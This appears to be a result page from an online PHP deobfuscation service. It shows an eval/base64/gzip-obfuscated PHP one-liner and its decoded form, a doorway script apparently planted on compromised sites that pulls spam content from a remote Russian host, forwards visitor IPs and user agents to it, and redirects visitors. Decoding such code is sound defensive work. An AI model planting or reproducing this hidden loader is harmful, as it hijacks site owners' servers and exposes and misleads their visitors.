Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? eval(gzuncompress(base64_decode('eF6lV21v2kgQ/gy/YmMh2ZwIgdy11xLlWgROw4mEHDG9ntLIcs0a3B..

Decoded Output download

error_reporting(0);

setcookie('c', 1);

$myHost = "dreo.indexautor.ru"; $pathOnMyHost = ""; $pathToDor = "webstat"; $template = '!!!android_251114_out_61'; $connect = 0; 


$path = substr($_SERVER['REQUEST_URI'], strlen($pathToDor));
$html = getContent($myHost, $pathOnMyHost.$path, $template,$pathToDor);

if (strstr($path, ".css")) header('Content-Type: text/css; charset=utf-8');
else if (strstr($path, ".png")) header('Content-Type: image/png');
else if (strstr($path, ".jpg") || strstr($path, ".jpeg")) header('Content-Type: image/jpeg');
else if (strstr($path, ".gif")) header('Content-Type: image/gif');
else if (strstr($path, ".ico")) header("Content-type: image/x-icon");
else if (strstr($path, ".xml")) header ('Content-type: text/xml; charset=utf-8');
else if (strstr($path, ".txt")) header('Content-Type: text/plain; charset=utf-8');
else if (strstr($path, ".js")) header('Content-Type: text/javascript; charset=utf-8');
else if (strstr($path, "rss")) header ('Content-type: text/xml; charset=utf-8');
else header('Content-Type: text/html; charset=utf-8');

echo($html);

function getContent($host, $path, $template, $pathToDor) {
	global $connect, $pathOnMyHost;
	if ($connect) {
	
		$headers = array(
			"User-Agent: $template"
			."|$pathToDor"
			."|$pathOnMyHost"
			."|http://".$_SERVER['HTTP_HOST']
			."|".getUserIP()
			."|".$_SERVER['HTTP_USER_AGENT'],
			"Referer: http://".$_SERVER['HTTP_HOST']
		);
		
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, 'http://'.$host.$path);
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headers );
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15 );
		curl_setopt($ch, CURLOPT_TIMEOUT, 15 );
		$result = curl_redir_exec( $ch );
		curl_close($ch);
		return $result;
	} else {
		$buff = '';
		$socket = @fsockopen($host, 80, $errno, $errstr);
		if ($socket) {
			@fputs($socket, "GET {$path} HTTP/1.0
");
			@fputs($socket, "Host: {$host}
");
			@fputs($socket, "Referer: http://".$_SERVER['HTTP_HOST']."
");
			@fputs($socket, "User-Agent:  $template"
				."|$pathToDor"
				."|$pathOnMyHost"
				."|http://".$_SERVER['HTTP_HOST']
				."|".getUserIP()
				."|".$_SERVER['HTTP_USER_AGENT']
				."
"
			);
			@fputs($socket, "Connection: close

");

			while (!@feof($socket)) {
				$buff .= @fgets($socket, 128);
			}
			
			@fclose($socket);
			$result = explode("

", $buff, 2);
					
			if (preg_match("~Location: (.*)~", $result[0], $m)) {
				header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
				header("Cache-Control: no-cache, must-revalidate"); 				header("Pragma: no-cache"); 				header("Last-Modified: ".gmdate("D, d M Y H:i:s")."GMT");
				header("HTTP/1.1 301 Moved Permanently");
				header("Location: ".str_replace($pathOnMyHost, '', $m[1]));exit;
			}
			
			return $result[1];
		} else return "";
	}
}
function getUserIP() {
	$array = array('HTTP_X_REAL_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR', 'HTTP_X_REMOTECLIENT_IP');
	foreach($array as $key)
		if(filter_var($_SERVER[$key], FILTER_VALIDATE_IP)) return $_SERVER[$key];
	return false;
}
function curl_redir_exec($ch) {
	global $pathOnMyHost;
    static $curl_loops = 0;  
    static $curl_max_loops = 20;  
    if ($curl_loops   >= $curl_max_loops) {  
		$curl_loops = 0;  
        return FALSE;  
    }
    curl_setopt($ch, CURLOPT_HEADER, true);  
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
    $data = curl_exec($ch);  
    list($header, $data) = explode("

", $data, 2);  
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);  
    if ($http_code == 301 || $http_code == 302) {
		$matches = array();  
		preg_match("~Location:(.*?)(?:
|$)~", $header, $matches); 
		$url = @parse_url(trim(array_pop($matches)));
        if (!$url) {
						$curl_loops = 0;  
			return $data;  
        }  
		$last_url = parse_url(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL));  
		if (!$url['scheme']) $url['scheme'] = $last_url['scheme'];  
		if (!$url['host']) $url['host'] = $last_url['host'];  
		if (!$url['path']) $url['path'] = $last_url['path'];  
		
				$new_url = $url['path'] . ($url['query']?'?'.$url['query']:'');
		
		header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
		header("Cache-Control: no-cache, must-revalidate");
		header("Pragma: no-cache");
		header("Last-Modified: ".gmdate("D, d M Y H:i:s")."GMT");
		header("HTTP/1.1 301 Moved Permanently");
		header("Location: ".str_replace($pathOnMyHost, '', $new_url));exit;
    } else {  
		$curl_loops=0;  
		return $data;  
	}  
}

Did this file decode correctly?

Original Code

<? eval(gzuncompress(base64_decode('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'))); ?>

Function Calls

gzuncompress 1
base64_decode 1

Variables

None

Stats

MD5 2779c8e8ae602e7d296fea6f48a17739
Eval Count 1
Decode Time 90 ms